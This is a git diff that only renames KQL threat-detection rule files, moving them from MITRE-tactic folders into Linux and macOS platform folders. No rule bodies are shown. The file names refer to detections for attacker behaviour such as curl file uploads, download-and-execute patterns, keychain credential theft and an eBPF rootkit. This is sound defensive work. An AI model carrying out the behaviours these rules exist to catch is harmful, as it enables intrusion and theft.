diff --git a/KQL/rules/Execution/python_spawning_pretty_tty_via_pty_module.kql b/KQL/rules/linux/process_creation/python_spawning_pretty_tty_via_pty_module.kql
similarity index 100%
rename from KQL/rules/Execution/python_spawning_pretty_tty_via_pty_module.kql
rename to KQL/rules/linux/process_creation/python_spawning_pretty_tty_via_pty_module.kql
diff --git a/KQL/rules/Exfiltration/python_webserver_execution_linux.kql b/KQL/rules/linux/process_creation/python_webserver_execution_linux.kql
similarity index 100%
rename from KQL/rules/Exfiltration/python_webserver_execution_linux.kql
rename to KQL/rules/linux/process_creation/python_webserver_execution_linux.kql
diff --git a/KQL/rules/Persistence/remote_access_tool_team_viewer_session_started_on_linux_host.kql b/KQL/rules/linux/process_creation/remote_access_tool_team_viewer_session_started_on_linux_host.kql
similarity index 100%
rename from KQL/rules/Persistence/remote_access_tool_team_viewer_session_started_on_linux_host.kql
rename to KQL/rules/linux/process_creation/remote_access_tool_team_viewer_session_started_on_linux_host.kql
diff --git a/KQL/rules/Defense Evasion/remove_immutable_file_attribute.kql b/KQL/rules/linux/process_creation/remove_immutable_file_attribute.kql
similarity index 100%
rename from KQL/rules/Defense Evasion/remove_immutable_file_attribute.kql
rename to KQL/rules/linux/process_creation/remove_immutable_file_attribute.kql
diff --git a/KQL/rules/Defense Evasion/remove_scheduled_cron_task_job.kql b/KQL/rules/linux/process_creation/remove_scheduled_cron_task_job.kql
similarity index 100%
rename from KQL/rules/Defense Evasion/remove_scheduled_cron_task_job.kql
rename to KQL/rules/linux/process_creation/remove_scheduled_cron_task_job.kql
diff --git a/KQL/rules/Execution/scheduled_cron_task_job_linux.kql b/KQL/rules/linux/process_creation/scheduled_cron_task_job_linux.kql
similarity index 100%
rename from KQL/rules/Execution/scheduled_cron_task_job_linux.kql
rename to KQL/rules/linux/process_creation/scheduled_cron_task_job_linux.kql
diff --git a/KQL/rules/Privilege Escalation/scheduled_task_job_at.kql b/KQL/rules/linux/process_creation/scheduled_task_job_at.kql
similarity index 100%
rename from KQL/rules/Privilege Escalation/scheduled_task_job_at.kql
rename to KQL/rules/linux/process_creation/scheduled_task_job_at.kql
diff --git a/KQL/rules/Discovery/security_software_discovery_linux.kql b/KQL/rules/linux/process_creation/security_software_discovery_linux.kql
similarity index 100%
rename from KQL/rules/Discovery/security_software_discovery_linux.kql
rename to KQL/rules/linux/process_creation/security_software_discovery_linux.kql
diff --git a/KQL/rules/Defense Evasion/setuid_and_setgid.kql b/KQL/rules/linux/process_creation/setuid_and_setgid.kql
similarity index 100%
rename from KQL/rules/Defense Evasion/setuid_and_setgid.kql
rename to KQL/rules/linux/process_creation/setuid_and_setgid.kql
diff --git a/KQL/rules/Discovery/shell_execution_gcc_linux.kql b/KQL/rules/linux/process_creation/shell_execution_gcc_linux.kql
similarity index 100%
rename from KQL/rules/Discovery/shell_execution_gcc_linux.kql
rename to KQL/rules/linux/process_creation/shell_execution_gcc_linux.kql
diff --git a/KQL/rules/Execution/shell_execution_of_process_located_in_tmp_directory.kql b/KQL/rules/linux/process_creation/shell_execution_of_process_located_in_tmp_directory.kql
similarity index 100%
rename from KQL/rules/Execution/shell_execution_of_process_located_in_tmp_directory.kql
rename to KQL/rules/linux/process_creation/shell_execution_of_process_located_in_tmp_directory.kql
diff --git a/KQL/rules/Discovery/shell_execution_via_find_linux.kql b/KQL/rules/linux/process_creation/shell_execution_via_find_linux.kql
similarity index 100%
rename from KQL/rules/Discovery/shell_execution_via_find_linux.kql
rename to KQL/rules/linux/process_creation/shell_execution_via_find_linux.kql
diff --git a/KQL/rules/Discovery/shell_execution_via_flock_linux.kql b/KQL/rules/linux/process_creation/shell_execution_via_flock_linux.kql
similarity index 100%
rename from KQL/rules/Discovery/shell_execution_via_flock_linux.kql
rename to KQL/rules/linux/process_creation/shell_execution_via_flock_linux.kql
diff --git a/KQL/rules/Execution/shell_execution_via_git_linux.kql b/KQL/rules/linux/process_creation/shell_execution_via_git_linux.kql
similarity index 100%
rename from KQL/rules/Execution/shell_execution_via_git_linux.kql
rename to KQL/rules/linux/process_creation/shell_execution_via_git_linux.kql
diff --git a/KQL/rules/Discovery/shell_execution_via_nice_linux.kql b/KQL/rules/linux/process_creation/shell_execution_via_nice_linux.kql
similarity index 100%
rename from KQL/rules/Discovery/shell_execution_via_nice_linux.kql
rename to KQL/rules/linux/process_creation/shell_execution_via_nice_linux.kql
diff --git a/KQL/rules/Execution/shell_execution_via_rsync_linux.kql b/KQL/rules/linux/process_creation/shell_execution_via_rsync_linux.kql
similarity index 100%
rename from KQL/rules/Execution/shell_execution_via_rsync_linux.kql
rename to KQL/rules/linux/process_creation/shell_execution_via_rsync_linux.kql
diff --git a/KQL/rules/Discovery/shell_invocation_via_apt_linux.kql b/KQL/rules/linux/process_creation/shell_invocation_via_apt_linux.kql
similarity index 100%
rename from KQL/rules/Discovery/shell_invocation_via_apt_linux.kql
rename to KQL/rules/linux/process_creation/shell_invocation_via_apt_linux.kql
diff --git a/KQL/rules/Execution/shell_invocation_via_env_command_linux.kql b/KQL/rules/linux/process_creation/shell_invocation_via_env_command_linux.kql
similarity index 100%
rename from KQL/rules/Execution/shell_invocation_via_env_command_linux.kql
rename to KQL/rules/linux/process_creation/shell_invocation_via_env_command_linux.kql
diff --git a/KQL/rules/Execution/shell_invocation_via_ssh_linux.kql b/KQL/rules/linux/process_creation/shell_invocation_via_ssh_linux.kql
similarity index 100%
rename from KQL/rules/Execution/shell_invocation_via_ssh_linux.kql
rename to KQL/rules/linux/process_creation/shell_invocation_via_ssh_linux.kql
diff --git a/KQL/rules/Command and Control/suspicious_curl_change_user_agents_linux.kql b/KQL/rules/linux/process_creation/suspicious_curl_change_user_agents_linux.kql
similarity index 100%
rename from KQL/rules/Command and Control/suspicious_curl_change_user_agents_linux.kql
rename to KQL/rules/linux/process_creation/suspicious_curl_change_user_agents_linux.kql
diff --git a/KQL/rules/Exfiltration/suspicious_curl_file_upload_linux.kql b/KQL/rules/linux/process_creation/suspicious_curl_file_upload_linux.kql
similarity index 100%
rename from KQL/rules/Exfiltration/suspicious_curl_file_upload_linux.kql
rename to KQL/rules/linux/process_creation/suspicious_curl_file_upload_linux.kql
diff --git a/KQL/rules/Execution/suspicious_download_and_execute_pattern_via_curl_wget.kql b/KQL/rules/linux/process_creation/suspicious_download_and_execute_pattern_via_curl_wget.kql
similarity index 100%
rename from KQL/rules/Execution/suspicious_download_and_execute_pattern_via_curl_wget.kql
rename to KQL/rules/linux/process_creation/suspicious_download_and_execute_pattern_via_curl_wget.kql
diff --git a/KQL/rules/Reconnaissance/suspicious_git_clone_linux.kql b/KQL/rules/linux/process_creation/suspicious_git_clone_linux.kql
similarity index 100%
rename from KQL/rules/Reconnaissance/suspicious_git_clone_linux.kql
rename to KQL/rules/linux/process_creation/suspicious_git_clone_linux.kql
diff --git a/KQL/rules/Execution/suspicious_invocation_of_shell_via_awk_linux.kql b/KQL/rules/linux/process_creation/suspicious_invocation_of_shell_via_awk_linux.kql
similarity index 100%
rename from KQL/rules/Execution/suspicious_invocation_of_shell_via_awk_linux.kql
rename to KQL/rules/linux/process_creation/suspicious_invocation_of_shell_via_awk_linux.kql
diff --git a/KQL/rules/Execution/suspicious_invocation_of_shell_via_rsync.kql b/KQL/rules/linux/process_creation/suspicious_invocation_of_shell_via_rsync.kql
similarity index 100%
rename from KQL/rules/Execution/suspicious_invocation_of_shell_via_rsync.kql
rename to KQL/rules/linux/process_creation/suspicious_invocation_of_shell_via_rsync.kql
diff --git a/KQL/rules/Execution/suspicious_java_children_processes.kql b/KQL/rules/linux/process_creation/suspicious_java_children_processes.kql
similarity index 100%
rename from KQL/rules/Execution/suspicious_java_children_processes.kql
rename to KQL/rules/linux/process_creation/suspicious_java_children_processes.kql
diff --git a/KQL/rules/Execution/suspicious_nohup_execution.kql b/KQL/rules/linux/process_creation/suspicious_nohup_execution.kql
similarity index 100%
rename from KQL/rules/Execution/suspicious_nohup_execution.kql
rename to KQL/rules/linux/process_creation/suspicious_nohup_execution.kql
diff --git a/KQL/rules/Defense Evasion/suspicious_package_installed_linux.kql b/KQL/rules/linux/process_creation/suspicious_package_installed_linux.kql
similarity index 100%
rename from KQL/rules/Defense Evasion/suspicious_package_installed_linux.kql
rename to KQL/rules/linux/process_creation/suspicious_package_installed_linux.kql
diff --git a/KQL/rules/Defense Evasion/syslog_clearing_or_removal_via_system_utilities.kql b/KQL/rules/linux/process_creation/syslog_clearing_or_removal_via_system_utilities.kql
similarity index 100%
rename from KQL/rules/Defense Evasion/syslog_clearing_or_removal_via_system_utilities.kql
rename to KQL/rules/linux/process_creation/syslog_clearing_or_removal_via_system_utilities.kql
diff --git a/KQL/rules/Discovery/system_information_discovery.kql b/KQL/rules/linux/process_creation/system_information_discovery.kql
similarity index 100%
rename from KQL/rules/Discovery/system_information_discovery.kql
rename to KQL/rules/linux/process_creation/system_information_discovery.kql
diff --git a/KQL/rules/Discovery/system_network_connections_discovery_linux.kql b/KQL/rules/linux/process_creation/system_network_connections_discovery_linux.kql
similarity index 100%
rename from KQL/rules/Discovery/system_network_connections_discovery_linux.kql
rename to KQL/rules/linux/process_creation/system_network_connections_discovery_linux.kql
diff --git a/KQL/rules/Discovery/system_network_discovery_linux.kql b/KQL/rules/linux/process_creation/system_network_discovery_linux.kql
similarity index 100%
rename from KQL/rules/Discovery/system_network_discovery_linux.kql
rename to KQL/rules/linux/process_creation/system_network_discovery_linux.kql
diff --git a/KQL/rules/Defense Evasion/touch_suspicious_service_file.kql b/KQL/rules/linux/process_creation/touch_suspicious_service_file.kql
similarity index 100%
rename from KQL/rules/Defense Evasion/touch_suspicious_service_file.kql
rename to KQL/rules/linux/process_creation/touch_suspicious_service_file.kql
diff --git a/KQL/rules/Defense Evasion/triple_cross_ebpf_rootkit_execve_hijack.kql b/KQL/rules/linux/process_creation/triple_cross_ebpf_rootkit_execve_hijack.kql
similarity index 100%
rename from KQL/rules/Defense Evasion/triple_cross_ebpf_rootkit_execve_hijack.kql
rename to KQL/rules/linux/process_creation/triple_cross_ebpf_rootkit_execve_hijack.kql
diff --git a/KQL/rules/Defense Evasion/triple_cross_ebpf_rootkit_install_commands.kql b/KQL/rules/linux/process_creation/triple_cross_ebpf_rootkit_install_commands.kql
similarity index 100%
rename from KQL/rules/Defense Evasion/triple_cross_ebpf_rootkit_install_commands.kql
rename to KQL/rules/linux/process_creation/triple_cross_ebpf_rootkit_install_commands.kql
diff --git a/KQL/rules/Defense Evasion/ufw_force_stop_using_ufw_init.kql b/KQL/rules/linux/process_creation/ufw_force_stop_using_ufw_init.kql
similarity index 100%
rename from KQL/rules/Defense Evasion/ufw_force_stop_using_ufw_init.kql
rename to KQL/rules/linux/process_creation/ufw_force_stop_using_ufw_init.kql
diff --git a/KQL/rules/Privilege Escalation/user_added_to_root_sudoers_group_using_usermod.kql b/KQL/rules/linux/process_creation/user_added_to_root_sudoers_group_using_usermod.kql
similarity index 100%
rename from KQL/rules/Privilege Escalation/user_added_to_root_sudoers_group_using_usermod.kql
rename to KQL/rules/linux/process_creation/user_added_to_root_sudoers_group_using_usermod.kql
diff --git a/KQL/rules/Impact/user_has_been_deleted_via_userdel.kql b/KQL/rules/linux/process_creation/user_has_been_deleted_via_userdel.kql
similarity index 100%
rename from KQL/rules/Impact/user_has_been_deleted_via_userdel.kql
rename to KQL/rules/linux/process_creation/user_has_been_deleted_via_userdel.kql
diff --git a/KQL/rules/Discovery/vim_gtfobin_abuse_linux.kql b/KQL/rules/linux/process_creation/vim_gtfobin_abuse_linux.kql
similarity index 100%
rename from KQL/rules/Discovery/vim_gtfobin_abuse_linux.kql
rename to KQL/rules/linux/process_creation/vim_gtfobin_abuse_linux.kql
diff --git a/KQL/rules/Persistence/macos_emond_launch_daemon.kql b/KQL/rules/macos/file_event/macos_emond_launch_daemon.kql
similarity index 100%
rename from KQL/rules/Persistence/macos_emond_launch_daemon.kql
rename to KQL/rules/macos/file_event/macos_emond_launch_daemon.kql
diff --git a/KQL/rules/Persistence/startup_item_file_created_macos.kql b/KQL/rules/macos/file_event/startup_item_file_created_macos.kql
similarity index 100%
rename from KQL/rules/Persistence/startup_item_file_created_macos.kql
rename to KQL/rules/macos/file_event/startup_item_file_created_macos.kql
diff --git a/KQL/rules/Defense Evasion/binary_padding_macos.kql b/KQL/rules/macos/process_creation/binary_padding_macos.kql
similarity index 100%
rename from KQL/rules/Defense Evasion/binary_padding_macos.kql
rename to KQL/rules/macos/process_creation/binary_padding_macos.kql
diff --git a/KQL/rules/Collection/clipboard_data_collection_via_osascript.kql b/KQL/rules/macos/process_creation/clipboard_data_collection_via_osascript.kql
similarity index 100%
rename from KQL/rules/Collection/clipboard_data_collection_via_osascript.kql
rename to KQL/rules/macos/process_creation/clipboard_data_collection_via_osascript.kql
diff --git a/KQL/rules/Persistence/creation_of_a_local_user_account.kql b/KQL/rules/macos/process_creation/creation_of_a_local_user_account.kql
similarity index 100%
rename from KQL/rules/Persistence/creation_of_a_local_user_account.kql
rename to KQL/rules/macos/process_creation/creation_of_a_local_user_account.kql
diff --git a/KQL/rules/Credential Access/credentials_from_password_stores_keychain.kql b/KQL/rules/macos/process_creation/credentials_from_password_stores_keychain.kql
similarity index 100%
rename from KQL/rules/Credential Access/credentials_from_password_stores_keychain.kql
rename to KQL/rules/macos/process_creation/credentials_from_password_stores_keychain.kql
diff --git a/KQL/rules/Credential Access/credentials_in_files.kql b/KQL/rules/macos/process_creation/credentials_in_files.kql
similarity index 100%
rename from KQL/rules/Credential Access/credentials_in_files.kql
rename to KQL/rules/macos/process_creation/credentials_in_files.kql
diff --git a/KQL/rules/Defense Evasion/decode_base64_encoded_text_macos.kql b/KQL/rules/macos/process_creation/decode_base64_encoded_text_macos.kql
similarity index 100%
rename from KQL/rules/Defense Evasion/decode_base64_encoded_text_macos.kql
rename to KQL/rules/macos/process_creation/decode_base64_encoded_text_macos.kql
diff --git a/KQL/rules/Defense Evasion/disable_security_tools.kql b/KQL/rules/macos/process_creation/disable_security_tools.kql
similarity index 100%
rename from KQL/rules/Defense Evasion/disable_security_tools.kql
rename to KQL/rules/macos/process_creation/disable_security_tools.kql
diff --git a/KQL/rules/Exfiltration/disk_image_creation_via_hdiutil_macos.kql b/KQL/rules/macos/process_creation/disk_image_creation_via_hdiutil_macos.kql
similarity index 100%
rename from KQL/rules/Exfiltration/disk_image_creation_via_hdiutil_macos.kql
rename to KQL/rules/macos/process_creation/disk_image_creation_via_hdiutil_macos.kql
diff --git a/KQL/rules/Initial Access/disk_image_mounting_via_hdiutil_macos.kql b/KQL/rules/macos/process_creation/disk_image_mounting_via_hdiutil_macos.kql
similarity index 100%
rename from KQL/rules/Initial Access/disk_image_mounting_via_hdiutil_macos.kql
rename to KQL/rules/macos/process_creation/disk_image_mounting_via_hdiutil_macos.kql
diff --git a/KQL/rules/Discovery/file_and_directory_discovery_macos.kql b/KQL/rules/macos/process_creation/file_and_directory_discovery_macos.kql
similarity index 100%
rename from KQL/rules/Discovery/file_and_directory_discovery_macos.kql
rename to KQL/rules/macos/process_creation/file_and_directory_discovery_macos.kql
diff --git a/KQL/rules/Defense Evasion/file_download_via_nscurl_macos.kql b/KQL/rules/macos/process_creation/file_download_via_nscurl_macos.kql
similarity index 100%
rename from KQL/rules/Defense Evasion/file_download_via_nscurl_macos.kql
rename to KQL/rules/macos/process_creation/file_download_via_nscurl_macos.kql
diff --git a/KQL/rules/Defense Evasion/file_time_attribute_change.kql b/KQL/rules/macos/process_creation/file_time_attribute_change.kql
similarity index 100%
rename from KQL/rules/Defense Evasion/file_time_attribute_change.kql
rename to KQL/rules/macos/process_creation/file_time_attribute_change.kql
diff --git a/KQL/rules/Defense Evasion/gatekeeper_bypass_via_xattr.kql b/KQL/rules/macos/process_creation/gatekeeper_bypass_via_xattr.kql
similarity index 100%
rename from KQL/rules/Defense Evasion/gatekeeper_bypass_via_xattr.kql
rename to KQL/rules/macos/process_creation/gatekeeper_bypass_via_xattr.kql
diff --git a/KQL/rules/Privilege Escalation/guest_account_enabled_via_sysadminctl.kql b/KQL/rules/macos/process_creation/guest_account_enabled_via_sysadminctl.kql
similarity index 100%
rename from KQL/rules/Privilege Escalation/guest_account_enabled_via_sysadminctl.kql
rename to KQL/rules/macos/process_creation/guest_account_enabled_via_sysadminctl.kql
diff --git a/KQL/rules/Collection/gui_input_capture_macos.kql b/KQL/rules/macos/process_creation/gui_input_capture_macos.kql
similarity index 100%
rename from KQL/rules/Collection/gui_input_capture_macos.kql
rename to KQL/rules/macos/process_creation/gui_input_capture_macos.kql
diff --git a/KQL/rules/Defense Evasion/hidden_flag_set_on_file_directory_via_chflags_macos.kql b/KQL/rules/macos/process_creation/hidden_flag_set_on_file_directory_via_chflags_macos.kql
similarity index 100%
rename from KQL/rules/Defense Evasion/hidden_flag_set_on_file_directory_via_chflags_macos.kql
rename to KQL/rules/macos/process_creation/hidden_flag_set_on_file_directory_via_chflags_macos.kql
diff --git a/KQL/rules/Defense Evasion/hidden_user_creation.kql b/KQL/rules/macos/process_creation/hidden_user_creation.kql
similarity index 100%
rename from KQL/rules/Defense Evasion/hidden_user_creation.kql
rename to KQL/rules/macos/process_creation/hidden_user_creation.kql
diff --git a/KQL/rules/Defense Evasion/indicator_removal_on_host_clear_mac_system_logs.kql b/KQL/rules/macos/process_creation/indicator_removal_on_host_clear_mac_system_logs.kql
similarity index 100%
rename from KQL/rules/Defense Evasion/indicator_removal_on_host_clear_mac_system_logs.kql
rename to KQL/rules/macos/process_creation/indicator_removal_on_host_clear_mac_system_logs.kql
diff --git a/KQL/rules/Execution/jamf_mdm_execution.kql b/KQL/rules/macos/process_creation/jamf_mdm_execution.kql
similarity index 100%
rename from KQL/rules/Execution/jamf_mdm_execution.kql
rename to KQL/rules/macos/process_creation/jamf_mdm_execution.kql
diff --git a/KQL/rules/Execution/jamf_mdm_potential_suspicious_child_process.kql b/KQL/rules/macos/process_creation/jamf_mdm_potential_suspicious_child_process.kql
similarity index 100%
rename from KQL/rules/Execution/jamf_mdm_potential_suspicious_child_process.kql
rename to KQL/rules/macos/process_creation/jamf_mdm_potential_suspicious_child_process.kql
diff --git a/KQL/rules/Execution/jxa_in_memory_execution_via_osascript.kql b/KQL/rules/macos/process_creation/jxa_in_memory_execution_via_osascript.kql
similarity index 100%
rename from KQL/rules/Execution/jxa_in_memory_execution_via_osascript.kql
rename to KQL/rules/macos/process_creation/jxa_in_memory_execution_via_osascript.kql
diff --git a/KQL/rules/Privilege Escalation/launch_agent_daemon_execution_via_launchctl.kql b/KQL/rules/macos/process_creation/launch_agent_daemon_execution_via_launchctl.kql
similarity index 100%
rename from KQL/rules/Privilege Escalation/launch_agent_daemon_execution_via_launchctl.kql
rename to KQL/rules/macos/process_creation/launch_agent_daemon_execution_via_launchctl.kql
diff --git a/KQL/rules/Discovery/local_groups_discovery_macos.kql b/KQL/rules/macos/process_creation/local_groups_discovery_macos.kql
similarity index 100%
rename from KQL/rules/Discovery/local_groups_discovery_macos.kql
rename to KQL/rules/macos/process_creation/local_groups_discovery_macos.kql
diff --git a/KQL/rules/Discovery/local_system_accounts_discovery_macos.kql b/KQL/rules/macos/process_creation/local_system_accounts_discovery_macos.kql
similarity index 100%
rename from KQL/rules/Discovery/local_system_accounts_discovery_macos.kql
rename to KQL/rules/macos/process_creation/local_system_accounts_discovery_macos.kql
diff --git a/KQL/rules/Discovery/macos_network_service_scanning.kql b/KQL/rules/macos/process_creation/macos_network_service_scanning.kql
similarity index 100%
rename from KQL/rules/Discovery/macos_network_service_scanning.kql
rename to KQL/rules/macos/process_creation/macos_network_service_scanning.kql
diff --git a/KQL/rules/Discovery/macos_remote_system_discovery.kql b/KQL/rules/macos/process_creation/macos_remote_system_discovery.kql
similarity index 100%
rename from KQL/rules/Discovery/macos_remote_system_discovery.kql
rename to KQL/rules/macos/process_creation/macos_remote_system_discovery.kql
diff --git a/KQL/rules/Execution/macos_scripting_interpreter_applescript.kql b/KQL/rules/macos/process_creation/macos_scripting_interpreter_applescript.kql
similarity index 100%
rename from KQL/rules/Execution/macos_scripting_interpreter_applescript.kql
rename to KQL/rules/macos/process_creation/macos_scripting_interpreter_applescript.kql
diff --git a/KQL/rules/Discovery/network_sniffing_macos.kql b/KQL/rules/macos/process_creation/network_sniffing_macos.kql
similarity index 100%
rename from KQL/rules/Discovery/network_sniffing_macos.kql
rename to KQL/rules/macos/process_creation/network_sniffing_macos.kql
diff --git a/KQL/rules/Impact/new_file_exclusion_added_to_time_machine_via_tmutil_macos.kql b/KQL/rules/macos/process_creation/new_file_exclusion_added_to_time_machine_via_tmutil_macos.kql
similarity index 100%
rename from KQL/rules/Impact/new_file_exclusion_added_to_time_machine_via_tmutil_macos.kql
rename to KQL/rules/macos/process_creation/new_file_exclusion_added_to_time_machine_via_tmutil_macos.kql
diff --git a/KQL/rules/Execution/osacompile_execution_by_potentially_suspicious_applet_osascript.kql b/KQL/rules/macos/process_creation/osacompile_execution_by_potentially_suspicious_applet_osascript.kql
similarity index 100%
rename from KQL/rules/Execution/osacompile_execution_by_potentially_suspicious_applet_osascript.kql
rename to KQL/rules/macos/process_creation/osacompile_execution_by_potentially_suspicious_applet_osascript.kql
diff --git a/KQL/rules/Execution/osacompile_run_only_execution.kql b/KQL/rules/macos/process_creation/osacompile_run_only_execution.kql
similarity index 100%
rename from KQL/rules/Execution/osacompile_run_only_execution.kql
rename to KQL/rules/macos/process_creation/osacompile_run_only_execution.kql
diff --git a/KQL/rules/Execution/payload_decoded_and_decrypted_via_built_in_utilities.kql b/KQL/rules/macos/process_creation/payload_decoded_and_decrypted_via_built_in_utilities.kql
similarity index 100%
rename from KQL/rules/Execution/payload_decoded_and_decrypted_via_built_in_utilities.kql
rename to KQL/rules/macos/process_creation/payload_decoded_and_decrypted_via_built_in_utilities.kql
diff --git a/KQL/rules/Defense Evasion/potential_base64_decoded_from_images.kql b/KQL/rules/macos/process_creation/potential_base64_decoded_from_images.kql
similarity index 100%
rename from KQL/rules/Defense Evasion/potential_base64_decoded_from_images.kql
rename to KQL/rules/macos/process_creation/potential_base64_decoded_from_images.kql
diff --git a/KQL/rules/Discovery/potential_discovery_activity_using_find_macos.kql b/KQL/rules/macos/process_creation/potential_discovery_activity_using_find_macos.kql
similarity index 100%
rename from KQL/rules/Discovery/potential_discovery_activity_using_find_macos.kql
rename to KQL/rules/macos/process_creation/potential_discovery_activity_using_find_macos.kql
diff --git a/KQL/rules/Command and Control/potential_in_memory_download_and_compile_of_payloads.kql b/KQL/rules/macos/process_creation/potential_in_memory_download_and_compile_of_payloads.kql
similarity index 100%
rename from KQL/rules/Command and Control/potential_in_memory_download_and_compile_of_payloads.kql
rename to KQL/rules/macos/process_creation/potential_in_memory_download_and_compile_of_payloads.kql
diff --git a/KQL/rules/Privilege Escalation/potential_persistence_via_plistbuddy.kql b/KQL/rules/macos/process_creation/potential_persistence_via_plistbuddy.kql
similarity index 100%
rename from KQL/rules/Privilege Escalation/potential_persistence_via_plistbuddy.kql
rename to KQL/rules/macos/process_creation/potential_persistence_via_plistbuddy.kql
diff --git a/KQL/rules/Command and Control/potential_wizardupdate_malware_infection.kql b/KQL/rules/macos/process_creation/potential_wizardupdate_malware_infection.kql
similarity index 100%
rename from KQL/rules/Command and Control/potential_wizardupdate_malware_infection.kql
rename to KQL/rules/macos/process_creation/potential_wizardupdate_malware_infection.kql
diff --git a/KQL/rules/Command and Control/potential_xcsset_malware_infection.kql b/KQL/rules/macos/process_creation/potential_xcsset_malware_infection.kql
similarity index 100%
rename from KQL/rules/Command and Control/potential_xcsset_malware_infection.kql
rename to KQL/rules/macos/process_creation/potential_xcsset_malware_infection.kql
diff --git a/KQL/rules/Command and Control/remote_access_tool_potential_meshagent_execution_macos.kql b/KQL/rules/macos/process_creation/remote_access_tool_potential_meshagent_execution_macos.kql
similarity index 100%
rename from KQL/rules/Command and Control/remote_access_tool_potential_meshagent_execution_macos.kql
rename to KQL/rules/macos/process_creation/remote_access_tool_potential_meshagent_execution_macos.kql
diff --git a/KQL/rules/Command and Control/remote_access_tool_renamed_meshagent_execution_macos.kql b/KQL/rules/macos/process_creation/remote_access_tool_renamed_meshagent_execution_macos.kql
similarity index 100%
rename from KQL/rules/Command and Control/remote_access_tool_renamed_meshagent_execution_macos.kql
rename to KQL/rules/macos/process_creation/remote_access_tool_renamed_meshagent_execution_macos.kql
diff --git a/KQL/rules/Persistence/remote_access_tool_team_viewer_session_started_on_macos_host.kql b/KQL/rules/macos/process_creation/remote_access_tool_team_viewer_session_started_on_macos_host.kql
similarity index 100%
rename from KQL/rules/Persistence/remote_access_tool_team_viewer_session_started_on_macos_host.kql
rename to KQL/rules/macos/process_creation/remote_access_tool_team_viewer_session_started_on_macos_host.kql
diff --git a/KQL/rules/Privilege Escalation/root_account_enable_via_dsenableroot.kql b/KQL/rules/macos/process_creation/root_account_enable_via_dsenableroot.kql similarity index 100% rename from KQL/rules/Privilege Escalation/root_account_enable_via_dsenableroot.kql rename to KQL/rules/macos/process_creation/root_account_enable_via_dsenableroot.kql diff --git a/KQL/rules/Execution/scheduled_cron_task_job_macos.kql b/KQL/rules/macos/process_creation/scheduled_cron_task_job_macos.kql similarity index 100% rename from KQL/rules/Execution/scheduled_cron_task_job_macos.kql rename to KQL/rules/macos/process_creation/scheduled_cron_task_job_macos.kql diff --git a/KQL/rules/Collection/screen_capture_macos.kql b/KQL/rules/macos/process_creation/screen_capture_macos.kql similarity index 100% rename from KQL/rules/Collection/screen_capture_macos.kql rename to KQL/rules/macos/process_creation/screen_capture_macos.kql diff --git a/KQL/rules/Discovery/security_software_discovery_macos.kql b/KQL/rules/macos/process_creation/security_software_discovery_macos.kql similarity index 100% rename from KQL/rules/Discovery/security_software_discovery_macos.kql rename to KQL/rules/macos/process_creation/security_software_discovery_macos.kql diff --git a/KQL/rules/Defense Evasion/space_after_filename_macos.kql b/KQL/rules/macos/process_creation/space_after_filename_macos.kql similarity index 100% rename from KQL/rules/Defense Evasion/space_after_filename_macos.kql rename to KQL/rules/macos/process_creation/space_after_filename_macos.kql diff --git a/KQL/rules/Exfiltration/split_a_file_into_pieces.kql b/KQL/rules/macos/process_creation/split_a_file_into_pieces.kql similarity index 100% rename from KQL/rules/Exfiltration/split_a_file_into_pieces.kql rename to KQL/rules/macos/process_creation/split_a_file_into_pieces.kql 
diff --git a/KQL/rules/Initial Access/suspicious_browser_child_process_macos.kql b/KQL/rules/macos/process_creation/suspicious_browser_child_process_macos.kql similarity index 100% rename from KQL/rules/Initial Access/suspicious_browser_child_process_macos.kql rename to KQL/rules/macos/process_creation/suspicious_browser_child_process_macos.kql diff --git a/KQL/rules/Initial Access/suspicious_execution_via_macos_script_editor.kql b/KQL/rules/macos/process_creation/suspicious_execution_via_macos_script_editor.kql similarity index 100% rename from KQL/rules/Initial Access/suspicious_execution_via_macos_script_editor.kql rename to KQL/rules/macos/process_creation/suspicious_execution_via_macos_script_editor.kql diff --git a/KQL/rules/Credential Access/suspicious_history_file_operations.kql b/KQL/rules/macos/process_creation/suspicious_history_file_operations.kql similarity index 100% rename from KQL/rules/Credential Access/suspicious_history_file_operations.kql rename to KQL/rules/macos/process_creation/suspicious_history_file_operations.kql diff --git a/KQL/rules/Execution/suspicious_installer_package_child_process.kql b/KQL/rules/macos/process_creation/suspicious_installer_package_child_process.kql similarity index 100% rename from KQL/rules/Execution/suspicious_installer_package_child_process.kql rename to KQL/rules/macos/process_creation/suspicious_installer_package_child_process.kql diff --git a/KQL/rules/Impact/suspicious_macos_firmware_activity.kql b/KQL/rules/macos/process_creation/suspicious_macos_firmware_activity.kql similarity index 100% rename from KQL/rules/Impact/suspicious_macos_firmware_activity.kql rename to KQL/rules/macos/process_creation/suspicious_macos_firmware_activity.kql 
diff --git a/KQL/rules/Execution/suspicious_microsoft_office_child_process_macos.kql b/KQL/rules/macos/process_creation/suspicious_microsoft_office_child_process_macos.kql similarity index 100% rename from KQL/rules/Execution/suspicious_microsoft_office_child_process_macos.kql rename to KQL/rules/macos/process_creation/suspicious_microsoft_office_child_process_macos.kql diff --git a/KQL/rules/Discovery/system_information_discovery_using_ioreg.kql b/KQL/rules/macos/process_creation/system_information_discovery_using_ioreg.kql similarity index 100% rename from KQL/rules/Discovery/system_information_discovery_using_ioreg.kql rename to KQL/rules/macos/process_creation/system_information_discovery_using_ioreg.kql diff --git a/KQL/rules/Discovery/system_information_discovery_using_sw_vers.kql b/KQL/rules/macos/process_creation/system_information_discovery_using_sw_vers.kql similarity index 100% rename from KQL/rules/Discovery/system_information_discovery_using_sw_vers.kql rename to KQL/rules/macos/process_creation/system_information_discovery_using_sw_vers.kql diff --git a/KQL/rules/Discovery/system_information_discovery_using_system_profiler.kql b/KQL/rules/macos/process_creation/system_information_discovery_using_system_profiler.kql similarity index 100% rename from KQL/rules/Discovery/system_information_discovery_using_system_profiler.kql rename to KQL/rules/macos/process_creation/system_information_discovery_using_system_profiler.kql diff --git a/KQL/rules/Defense Evasion/system_information_discovery_via_sysctl_macos.kql b/KQL/rules/macos/process_creation/system_information_discovery_via_sysctl_macos.kql similarity index 100% rename from KQL/rules/Defense Evasion/system_information_discovery_via_sysctl_macos.kql rename to KQL/rules/macos/process_creation/system_information_discovery_via_sysctl_macos.kql 
